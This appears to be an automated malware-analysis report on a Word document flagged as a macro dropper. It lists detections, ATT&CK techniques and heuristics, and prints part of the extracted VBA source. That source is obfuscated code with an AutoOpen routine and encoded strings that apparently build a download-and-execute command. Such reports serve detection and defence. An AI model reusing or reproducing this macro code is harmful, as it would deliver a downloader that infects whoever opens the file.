MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample is a Microsoft Office document containing a VBA macro with an AutoOpen subroutine. This macro utilizes a Shell() call, indicating an attempt to execute external commands. The ClamAV detection name 'Doc.Dropper.Agent-6546532-0' further suggests its role as a dropper. The macro's obfuscated nature and the presence of a Shell() call strongly imply it's designed to download and execute a secondary malicious payload.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6546532-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6546532-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 145074 bytes |
SHA-256: ee51e4e59dcdc64239db94715bff4da0b91641523af297facc891507c6d4a39f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "CPfvccZ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub EALTHq(NWujzN)
tpGRW = wPYjQk
akwha = RDtoS + CDbl(26096 - iFtbMO - HvsBVb + CDbl(53665)) - 68630 - CDbl(78732)
cDXpNd = NGuwQ
BnDiEr = 41825
End Sub
Sub WBItis(LwahOS)
PqDQb = OGTfq
qNRzXs = iGBOw + CDbl(68023 - iCIUOC - pYNanP + CDbl(2716)) - 66744 - CDbl(30267)
dDiBht = DpvnF
bHhpq = 22594
zQoOBp = WjcRw
TltBkw = HQZGu + CDbl(68382 - mTGaL - RiMOT + CDbl(37)) - 85395 - CDbl(80091)
TMdrPu = NjFtCq
qhURdR = 5732
CGZZlY = hkETiw
cDURw = ZURUa + CDbl(98582 - jwiOY - qKWRqI + CDbl(33658)) - 68104 - CDbl(96911)
pjMmd = RzMUw
hpFwl = 3977
End Sub
Sub jCpuEG(FldIf)
bzbkO = sbjkB
dmdhM = WPlOTz + CDbl(78858 - jbwjT - paciN + CDbl(40420)) - 70337 - CDbl(48206)
WCRor = TZYYml
lMfbv = 12382
QcAQwO = KuTrG
FPMBLz = MCaHhT + CDbl(49129 - QClZis - tCArcX + CDbl(18816)) - 58666 - CDbl(8694)
fnJVAd = zZUOC
jdoNtr = 65184
End Sub
Sub Autoopen()
On Error Resume Next
cFNWJ = UVICX
aBfPT = YVcEX + CDbl(57765 - KROnKP - WPDhwz + CDbl(82088)) - 55468 - CDbl(92330)
QSqjRh = ZtiTLp
ijfzj = 10763
RwojPbbJHWiHbQ (wmlzLw + wjlcNRFs + TUZvZA)
FnKsjR = QlTKZ
zNUrtq = RfFjFj + CDbl(98198 - ZFXmo - cvUGzo + CDbl(36711)) - 66573 - CDbl(1834)
olTwG = hCjGW
idnAS = 16387
End Sub
Sub jwYluX(zktCb)
insTPA = ZXUChN
NqTzW = rUVQA + CDbl(47703 - oAzJhf - vvlTlR + CDbl(16486)) - 33872 - CDbl(17968)
WDhUDI = tfQrK
bTqZL = 46466
KVCaH = EAOEB
LtuwrG = rjPBOv + CDbl(70959 - Jzurzt - QAAGMl + CDbl(7935)) - 31483 - CDbl(60894)
OQzXhW = SajtvT
iWouAT = 24640
jbctv = uznQka
flFbc = ZXNqVh + CDbl(25058 - pwJPMO - kXvob + CDbl(26294)) - 46257 - CDbl(51037)
cLtnzl = TXXnhT
HLiJFD = 59044
End Sub
Sub XLqvN(nBiBw)
NKnZc = Mqroa
QmncsE = XNcni + CDbl(95403 - XZfWp - kwXwYJ + CDbl(64335)) - 1280 - CDbl(81504)
IjkNib = KJdiZ
lXFbX = 63810
End Sub
Attribute VB_Name = "KVworRPrEiWSj"
Sub TDzka(CVMMEL)
lZShKT = imlwV
LfGaH = siSTI + CDbl(83783 - lloJmk - adSlBM + CDbl(97854)) - 58346 - CDbl(90064)
RBONkX = lEoSI
FKqMi = 33335
End Sub
Function wjlcNRFs()
On Error Resume Next
dzLomi = UZuQO
lBGdkB = ZXhvO + CDbl(33863 - MaKzQ - FCSpZ + CDbl(51867)) - 3904 - CDbl(20352)
MKXEVh = ENchD
GSPaU = 45747
UwVfVm = sbzbp
CfrSbf = anBzj + CDbl(12081 - SHiGp - jcijj + CDbl(89838)) - 19781 - CDbl(68040)
nsAtjw = uLUKHN
zVwPWG = 70695
DzHNFCzAVd = SEJBmV(".AB+3EB2Hcej3EB+3EBbo-3EB+3EBw3EB+3EBz2H+z23EB+3EBHe3CjNB5", 26284 + 6 - 26284, 26284 + 51 - 26284)
qlmRZA = mjVUn
JwpXQj = TmiwT + CDbl(90865 - KkincC - BPHRYh + CDbl(68083)) - 47682 - CDbl(76564)
mZinXH = FWXdEH
wiTzCB = 63891
Vljfrq = PcoWzW
JfiWN = APjAK + CDbl(87408 - PzdMNV - dzXPR + CDbl(70985)) - 52163 - CDbl(44830)
zXapX = aJqls
GFjVwF = 46550
qzoqcMLEQ = SEJBmV("aAlperc- 43]rAhC[,3EBaC43EBECAlperc- 29]rAhC[,)37]rAhC[+87]rAhC[+48]rAhC[( ECAlperc- )3EB}}{hcta'+'c};ka3EB+3'+'EBerb;)CDSfqo(3EB+3EB)z23EB+3EBHm3'+'EB+3EBetI-3EB94m9j6h", 84014 + 8 - 84014, 84014 + 162 - 84014)
zbIbG = KIOFcj
tjcjDN = XTWcc + CDbl(31886 - unuTf - FWYOw + CDbl(67446)) - 83684 - CDbl(92416)
vlIJW = YGlur
ufFfz = 81111
oIzSm = kwWTz
lKQkCj = JbMOwi + CDbl(38962 - KiDoAc - zCQqGp + CDbl(91376)) - 81047 - CDbl(17734)
iBvzf = FHILd
tzjSoa = 31837
KaAGTvZP = SEJBmV("Iu'F96i", 16390 + 5 - 16390, 16390 + 1 - 16390)
fwIvL = UMdwO
DwUjYk = hzhrRL + CDbl(44375 - RGnAV - pmhtz + CDbl(73608)) - 33117 - CDbl(62235)
dKwsYz = CtEvjW
FrkoGD = 10421
qIAuFf = IOMmrJ
MQTidM = jJCiB + CDbl(12053 - CYWMXN - MtZEGK + CDbl(82847)) - 76223 - CDbl(22424)
YMfYWE = MLiKw
QEYSGq = 80460
ijVmMv = SEJBmV("QI9lp+3EBr3EB+3EBt3EB+3EBSoTaC4.cfsafqo3EB+3EB(aC4el3EB+3EBJeD3EB+3EBIFda3EB+3EBOJeDln3EB+3EBWJ3EB+3EBeDoD3EB+3EB'+'aC4.'+'UYYfqo3EB+3EB{3EB+3EByrt{)XC'+'DAfq3EB+3EBo3EB+3EB 3E'+'B+3EBni cf3EB+3EL.kl", 80637 + 5 - 80637, 80637 + 190 - 80637)
UwIAWt = WCPswa
paHfU = ALiRN + CDbl(92046 - Ahskz - CEP
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.